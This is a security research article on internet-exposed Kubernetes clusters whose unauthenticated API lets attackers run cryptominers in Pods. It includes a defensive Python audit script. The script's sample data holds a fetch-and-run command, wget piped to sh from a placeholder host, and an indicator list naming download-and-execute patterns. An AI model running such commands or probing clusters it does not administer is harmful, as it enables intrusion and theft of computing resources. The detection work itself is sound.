
Kubernetes clusters being hijacked to mine cryptocurrencies

source link: https://www.tuicool.com/articles/hit/zymUnaQ

Kubernetes, a container orchestration system used by many companies worldwide, is a type of service we have been monitoring lately as we see issues like CVE-2018-1002105 appear.

Another reason for our interest in this service is that we have been detecting increasing numbers of Kubernetes clusters exposed to the internet.

But why is it a problem to expose Kubernetes to the internet?

As is typical with our findings, lots of companies are exposing their Kubernetes API with no authentication. Inside the Kubernetes cluster, small containers called Pods are run; essentially, a Pod represents a process inside the cluster.

By having this exposed, an attacker can not only see what is running on the Pods but also execute commands on the Pods themselves.

The result is that we are seeing many Kubernetes clusters worldwide having their Pods hijacked to mine cryptocurrencies.

We have identified exposed Kubernetes clusters belonging to all sorts of industries and company sizes, from small startups to Fortune 500 companies.

So how do we identify insecure Kubernetes and those that have been hijacked?

By using our HTTP Module we can create a custom HTTP request that checks the following path:

IP-ADDRESS:PORT/api/v1/pods

If we get a response, we can see all the information about the cluster.

[Screenshot: the JSON response to an unauthenticated request for /api/v1/pods, listing the cluster's Pods]

Looking further down, we can see the commands that were executed on the Pods, as in the following example:

[Screenshot: Pod specification showing the command executed inside the container]

If we take a look at the script "222.json", it already gives us an idea of what this might be:

[Screenshot: contents of the "222.json" script fetched by the hijacked Pod]

This Pod has been hijacked to mine cryptocurrency.
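The check described above, from the unauthenticated request for /api/v1/pods through to spotting a Pod whose command line fetches a script such as "222.json", can be scripted for a cluster you administer. The following is an added example written for this page, not BinaryEdge's HTTP Module or any code from the article. The Pod list it runs on is a constructed sample, the indicator strings (apart from "222.json", which the article names) are assumed and should be tuned per environment, and `fetch_pod_list` is a hypothetical entry point for checking your own API server.

```python
import json
import urllib.request
from urllib.error import HTTPError, URLError

# Constructed sample of what an unauthenticated GET /api/v1/pods can return,
# trimmed to the fields this check looks at. Not a real capture.
SAMPLE_POD_LIST = json.dumps({
    "kind": "PodList",
    "apiVersion": "v1",
    "items": [
        {
            "metadata": {"name": "web-frontend-7d9f", "namespace": "prod"},
            "spec": {"containers": [
                {"name": "nginx", "image": "nginx:1.15",
                 "command": ["nginx", "-g", "daemon off;"]}
            ]},
        },
        {
            "metadata": {"name": "kube-proxy-abc12", "namespace": "kube-system"},
            "spec": {"containers": [
                {"name": "miner", "image": "alpine:3.8",
                 "command": ["/bin/sh", "-c"],
                 "args": ["wget -qO- http://example.invalid/222.json | sh"]}
            ]},
        },
    ],
})

# Indicators of a hijacked Pod. "222.json" comes from the article; the
# shell-download patterns are assumed, generic examples to tune per cluster.
DEFAULT_INDICATORS = ("222.json", "curl ", "wget ", "| sh", "| bash", "/tmp/")


def classify_response(status, body):
    """Say how the API server answered an unauthenticated Pod listing.

    'exposed' - 200 with a PodList body: anyone can enumerate Pods
    'auth'    - 401/403: anonymous access is refused (the expected state)
    'unknown' - anything else (unreachable, not JSON, other status)
    """
    if status in (401, 403):
        return "auth"
    if status == 200:
        try:
            doc = json.loads(body)
        except ValueError:
            return "unknown"
        if isinstance(doc, dict) and doc.get("kind") == "PodList":
            return "exposed"
    return "unknown"


def command_line(container):
    """Flatten a container's command and args into one string for matching."""
    parts = list(container.get("command") or []) + list(container.get("args") or [])
    return " ".join(parts)


def find_suspicious_pods(pod_list_json, indicators=DEFAULT_INDICATORS):
    """Return (namespace, pod, container, matched indicator) for each container
    whose command line contains one of the indicator strings."""
    hits = []
    doc = json.loads(pod_list_json)
    for pod in doc.get("items", []):
        meta = pod.get("metadata", {})
        for c in pod.get("spec", {}).get("containers", []):
            cmd = command_line(c)
            for ind in indicators:
                if ind in cmd:
                    hits.append((meta.get("namespace"), meta.get("name"), c.get("name"), ind))
                    break  # one hit per container is enough
    return hits


def fetch_pod_list(base_url, timeout=10):
    """Hypothetical entry point: GET /api/v1/pods with no credentials against
    a cluster you administer and return (status, body). Not used offline."""
    req = urllib.request.Request(base_url.rstrip("/") + "/api/v1/pods")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")
    except URLError:
        return None, ""


def audit(status, body):
    """Combine the exposure verdict and the Pod scan into one report."""
    verdict = classify_response(status, body)
    hits = find_suspicious_pods(body) if verdict == "exposed" else []
    return {"verdict": verdict, "suspicious": hits}


if __name__ == "__main__":
    # Offline demonstration on the constructed sample.
    print(json.dumps(audit(200, SAMPLE_POD_LIST), indent=2))
```

A 401 or 403 on this path is the healthy result. On the kube-apiserver side, `--anonymous-auth=false` refuses unauthenticated requests outright, and the API endpoint should not be reachable from the internet at all; the indicator scan is only a quick triage of a listing you already hold, not a substitute for reviewing every Pod specification.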

We've seen other Pods that have exposed API tokens for different services, as well as critical data and passwords.

How can I check if my cluster has been exposed?

We've imported the scans we did into https://app.binaryedge.io.

[Screenshots: searching the imported Kubernetes scan results in app.binaryedge.io]

We would like to thank Random Robbie for helping us research and identify these issues.

